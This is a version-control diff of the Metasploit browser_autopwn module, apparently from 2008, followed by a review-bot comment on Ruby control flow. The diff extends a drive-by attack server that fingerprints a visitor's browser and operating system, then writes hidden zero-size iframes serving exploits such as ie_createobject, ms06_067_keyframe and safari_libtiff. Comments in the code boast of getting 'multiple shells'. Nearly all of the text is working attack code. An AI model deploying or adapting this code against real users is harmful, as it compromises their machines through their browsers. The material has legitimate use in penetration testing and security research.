Changeset 5573
- Timestamp:
- 07/23/08 03:26:42 (3 months ago)
- Files:
framework3/trunk/modules/auxiliary/server/browser_autopwn.rb
r5571 r5573 117 117 init_exploit('exploit/windows/browser/novelliprint_getdriversettings') 118 118 119 # Works on default IE 5 and 6 119 # Works on default IE 6 120 # Doesn't work on Windows 2000 IE 5.0 120 121 # I'm pretty sure keyframe works on everything this works on, but since 121 122 # this doesn't need javascript, try it anyway. 122 123 # does not require javascript 123 124 init_exploit('exploit/windows/browser/ms03_020_ie_objecttype') 125 126 # requires javascript 127 init_exploit('exploit/windows/browser/ie_createobject') 124 128 125 129 # I'm pretty sure keyframe works on everything this works on and more, … … 176 180 record_detection(cli, request) 177 181 send_not_found(cli) 178 when %r{^#{datastore['URIPATH']}}: 182 when %r{^#{datastore['URIPATH']}\?}: 183 when %r{^#{datastore['URIPATH']}$}: 179 184 # 180 185 # This is the request for exploits. At this point we should at … … 220 225 221 226 objects = { 227 'DirectAnimation.PathControl' => @exploits['exploit/windows/browser/ms06_067_keyframe'].get_resource, 222 228 '{88d969c5-f192-11d4-a65f-0040963251e5}' => @exploits['exploit/windows/browser/ms06_071_xml_core'].get_resource, 223 229 '{36723F97-7AA0-11D4-8919-FF2D71D0D32C}' => @exploits['exploit/windows/browser/novelliprint_getdriversettings'].get_resource, 224 'DirectAnimation.PathControl' => @exploits['exploit/windows/browser/ms06_067_keyframe'].get_resource, 230 '{BD96C556-65A3-11D0-983A-00C04FC29E36}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 231 '{BD96C556-65A3-11D0-983A-00C04FC29E30}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 232 '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 233 '{6414512B-B978-451D-A0D8-FCFDF33E833C}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 234 '{06723E09-F4C2-43c8-8358-09FCD1DB0766}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 235 
'{639F725F-1B2D-4831-A9FD-874847682010}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 236 '{BA018599-1DB3-44f9-83B4-461454C84BF8}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 237 '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 238 '{E8CCCDDF-CA28-496b-B050-6C07C962476B}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 239 '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 240 '{0006F033-0000-0000-C000-000000000046}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 241 '{0006F03A-0000-0000-C000-000000000046}' => @exploits['exploit/windows/browser/ie_createobject'].get_resource, 225 242 } 226 243 hash_declaration = objects.map{ |k, v| "'#{k}', '#{v}'," }.join.chop 227 244 228 245 js = <<-ENDJS 246 229 247 #{js_os_detect} 230 248 #{js_base64} … … 264 282 url = Base64.encode(url); 265 283 document.write(url + "<br>"); 266 xml.open("GET", document.location + " /sessid=" + url, false);284 xml.open("GET", document.location + "?sessid=" + url, false); 267 285 xml.send(null); 268 286 } … … 276 294 277 295 if ("#{HttpClients::IE}" == detected_version.browser_name) { 278 document.write("This is IE<br />");296 //document.write("This is IE<br />"); 279 297 // object_list contains key-value pairs like 280 // {classid} => / path/to/exploit/for/classid298 // {classid} => /srvpath/to/exploit/for/classid 281 299 // and 282 // ActiveXname => / path/to/exploit/for/ActiveXname300 // ActiveXname => /srvpath/to/exploit/for/ActiveXname 283 301 var object_list = new Hash(#{hash_declaration}); 284 302 var vuln_obj; 303 var written_frames = new Array(); 285 304 286 305 // iterate through our list of exploits 287 document.write("I have " + object_list.length + " objects to test <br />");306 //document.write("I have " + object_list.length + " objects to test <br />"); 288 307 for 
(var current_item in object_list.items) { 289 308 //document.write("Testing for object " + current_item + " ... "); 290 vuln_obj = undefined; 309 // Don't write the same iframe more than once. This is 310 // only an issue with ie_createobject which uses a ton of 311 // different classids to perform the same exploit. 312 // Assumes that no url will be a substring of another url. 313 if (-1 != written_frames.toString().indexOf(object_list.items[current_item])) { 314 //document.write("Already wrote an iframe for " + object_list.items[current_item] +"<br>"); 315 continue; 316 } 317 vuln_obj = ''; 291 318 if (current_item.substring(0,1) == '{') { 319 //document.write("which is a clasid <br />"); 320 292 321 // classids are stored surrounded in braces for an easy way to tell 293 322 // them from ActiveX object names, so if it has braces, strip them 294 323 // out and create an object element with that classid 295 var obj_elem = document.createElement("object"); 296 297 //document.write("which is a clasid <br />"); 298 if (obj_elem) { 299 obj_elem.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + current_item.substring( 1, current_item.length - 1 ) ) ; 300 //document.write("bug1? <br />"); 301 obj_elem.setAttribute("id", current_item); 302 //document.write("bug2? <br />"); 303 vuln_obj = document.getElementById(current_item); 304 //document.write("bug4? <br />"); 305 } else { 306 document.write("createElement failed <br />"); 307 } 324 var vuln_obj = document.createElement("object"); 325 326 vuln_obj.setAttribute("classid", "clsid:" + current_item.substring( 1, current_item.length - 1 ) ) ; 308 327 } else { 309 document.write("which is an AXO <br />"); 328 //document.write("which is an AXO name <br />"); 329 310 330 // otherwise, try to create an AXO with that name 311 try { 312 vuln_obj = new ActiveXObject(current_item); 313 } catch(e){} 331 try { vuln_obj = new ActiveXObject(current_item); } catch(e){} 314 332 } 333 // This doesn't bloody work. 
vuln_obj is always something 334 // that evaluates to true but there doesn't seem to be any 335 // way of determining if it is actually an ActiveX object. 336 // Since we can't tell if it will work, we end up just sending 337 // all of the iframes; some of them don't work, some of them 338 // do and we get multiple shells. Junior Varsity. 315 339 if (vuln_obj) { 316 //document.write("It exists, making evil iframe <br />"); 317 //sploit_frame += '#{build_iframe("' + object_list.items[current_item] + '")}'; 318 sploit_frame += '<p>' + object_list.items[current_item] + '</p>'; 319 sploit_frame += '<iframe '; 320 sploit_frame += 'src="'+ object_list.items[current_item] +'" '; 321 sploit_frame += 'style="visibility:hidden" height="0" width="0" border="0"></iframe>'; 340 document.write("It exists, making evil iframe <br />"); 341 sploit_frame += '#{build_iframe("' + object_list.items[current_item] + '")}'; 342 // why the hell is there no array.push() in javascript? 343 written_frames[written_frames.length] = object_list.items[current_item]; 322 344 } else { 323 345 //document.write("It does NOT exist, skipping. 
<br />"); … … 326 348 } // if IE 327 349 else { 328 document.write("this is NOT MSIE<br />");350 //document.write("this is NOT MSIE<br />"); 329 351 if (window.navigator.javaEnabled && window.navigator.javaEnabled()) { 330 352 sploit_frame += '#{build_iframe(@exploits['exploit/multi/browser/mozilla_navigatorjava'].get_resource)}'; … … 333 355 sploit_frame += '#{build_iframe(@exploits['exploit/multi/browser/mozilla_compareto'].get_resource)}'; 334 356 } 357 // eventually this exploit will have an auto target and 358 // this check won't be necessary 335 359 if ("#{OperatingSystems::MAC_OSX}" == detected_version.os_name) { 336 360 if (location.QueryInterface) { … … 340 364 } 341 365 if (0 < sploit_frame.length) { 342 document.write("Conditions optimal, writing evil iframe(s) <br />");366 //document.write("Conditions optimal, writing evil iframe(s) <br />"); 343 367 document.write(sploit_frame); 344 368 } … … 353 377 'object_list', 'vuln_obj', 354 378 'obj_elem', 'sploit_frame', 379 'written_frames', 355 380 'detected_version' 356 381 ], … … 366 391 js.update_opts(js_os_detect.opts) 367 392 js.update_opts(js_base64.opts) 368 js.obfuscate({'Strings'=>true})393 #js.obfuscate({'Strings'=>true}) 369 394 370 395 # Since ms03_020 works without javascript and we can guarantee with 371 396 # conditional comments that it won't eat resources in non-IE browsers, 372 397 # go ahead and send it with all responses in case our detection failed. 
398 # 399 # commented this out so i can test other exploits 373 400 body = <<-ENDHTML 374 401 <body id="#{js.sym('body_id')}"> 375 <!-- [if lt IE 7]> 402 <!-- 403 <!--[if lt IE 7]> 376 404 #{build_iframe(@exploits['exploit/windows/browser/ms03_020_ie_objecttype'].get_resource)} 377 405 <![endif]--> … … 379 407 380 408 response.body = ' <html> <head> <title> Loading </title> ' 381 response.body << ' <script type="text/javascript">' + js + ' </script> ' 382 response.body << ' </head> ' + body 383 409 response.body << ' <script language="javascript" type="text/javascript">' 410 response.body << "<!--\n" + js + ' //-->' 411 response.body << ' </script> </head> ' + body 412 413 # At this point in time all we have is the user agent detection. 414 # Consider moving the non-javascript exploits into the main body 415 # regardless of detected OS in case the user agent was spoofed. 384 416 case (get_target_os(cli)) 385 417 when OperatingSystems::WINDOWS … … 391 423 when OperatingSystems::MAC_OSX 392 424 if ('armle' == get_target_arch(cli)) 425 # Then it's an iPhone 393 426 response.body << build_iframe(@exploits['exploit/osx/armle/safari_libtiff'].get_resource) 394 427 end … … 399 432 end 400 433 434 # consider abstracting this out to a method (probably 435 # with a different name) of Auxiliary::Report or 436 # Exploit::Remote::HttpServer 401 437 def record_detection(cli, request) 402 438 os_name = nil … … 536 572 537 573 def build_iframe(resource) 538 #return "<p>#{resource}</p>" 539 return "<iframe src=\"#{resource}\" style=\"visibility:hidden\" height=\"0\" width=\"0\" border=\"0\"></iframe>" 574 ret = '' 575 ret << "<p>#{resource}</p>" 576 ret << "<iframe src=\"#{resource}\" style=\"visibility:hidden\" height=\"0\" width=\"0\" border=\"0\"></iframe>" 577 return ret 540 578 end 541 579 end
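Review bot: The new `when %r{^#{datastore['URIPATH']}\?}:` arm in the request dispatcher has an empty body, and a Ruby `case` arm does not fall through into the next one, so a request that matches it leaves the `case` with no response written at all; if the intent is to share the `$` arm's handling, the two patterns belong in one arm, `when %r{^#{datastore['URIPATH']}\?}, %r{^#{datastore['URIPATH']}$}:`, otherwise the arm should at least call `send_not_found(cli)` so the client is not left hanging. The method enclosing that `case` starts before the visible part of this section, so the earlier arms (including whichever one handles the `?sessid=` request the JavaScript now issues) cannot be checked here. Separately, `build_iframe` now prepends `<p>#{resource}</p>` to every frame, which appears to be debugging output like the commented `document.write` calls; it is worth a comment such as `# debug: visible resource path, remove before release` or a datastore-controlled switch so it is not shipped by accident.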
